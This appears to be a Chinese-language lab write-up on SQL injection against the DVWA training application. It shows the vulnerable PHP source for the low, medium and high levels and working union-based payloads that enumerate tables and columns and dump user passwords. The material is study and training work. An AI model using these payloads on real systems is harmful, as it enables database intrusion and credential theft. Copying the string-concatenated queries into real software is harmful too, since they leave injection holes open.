dvwa之sql injection
lsql injection 之low等级
low,php,没有任何过滤,把sql搜索到的所有记录都输出来
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
// Get input
$id = $_REQUEST[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$html .=$query;//自己加进去的 方便查看注入过程
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
mysqli_close($GLOBALS["___mysqli_ston"]);
}
?>
单引号报错了
使用1’ and ‘1’=‘1’;# 和1‘ and ‘1’=‘2’;# ,发现后一个没有输出,说明是字符型注入
看看sql语句里查询了几个参数,
1’ order by 3;# 报错了
1’ order by 2;#是没问题,所以查询的语句里查询了两个字段
看看回显了哪几个字段,两个位置都回显了~
database()查询当前数据库名字
-1‘ union select 1111,table_name from information_schema.tables where table_schema=‘dvwa’;#查询数据库dvwa里有哪些table
-1’ union select 1111,column_name from information_schema.columns where table_name=‘users’;# 查询出users表的所有column
-1’ union select last_name,password from dvwa.users;#查询dvwa数据库的users表的last_name和对应的password字段
sql injection 之medium等级
参数id是post的 所以用burp进行测试,发现是数字型注入,mysqli_real_escape_string()会对单引号双引号一类转义,所以在查询时 比如已经知道数据库为 dvwa 但是也不可以直接输入“dvwa”,会被转义为"dvwa",数据库会报错,而应该使用database();下一步骤的查询语句带入下一查询步骤,而不能直接带入上一步查询出的结果
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Display values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
}
// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];
mysqli_close($GLOBALS["___mysqli_ston"]);
?>
看看sql语句里查讯了几个字段.1+order+by+2;#
看看回显的字段,两个位置都会回显
查询当前数据库名字,为dvwa
查询dvwa数据库里的表名, -1+union+select+111,table_name+from+information_schema.tables+where+table_schema=database();#
id=-1 union select 111,column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema=database() limit 1,2);#查询users表里的列名们,limit 1,2是因为users表是数据库dvwa里的第二个表
-1 union select last_name,password+from+users;#查询具体的内容
比如 Brown的密码为abc123
sql injection之high等级
<?php
if( isset( $_SESSION [ 'id' ] ) ) {
// Get input
$id = $_SESSION[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
1’ and 1=1;#正常 1’ and 1=2;#无显示 说明是字符型注入
查询了两个字段,3就报错了
-1’ union select 11111,22222;# 看回显位置
查当前数据库名-1’ union select 11111,database();#
-1’ union select 11111,table_name from information_schema.tables where table_schema=database() ;# 查表名
查users表里的列名, -1’ union select 11111,column_name from information_schema.columns where table_name=‘users’;#
-1’ union select 11111,password from users;# 查具体字段
sql injection结束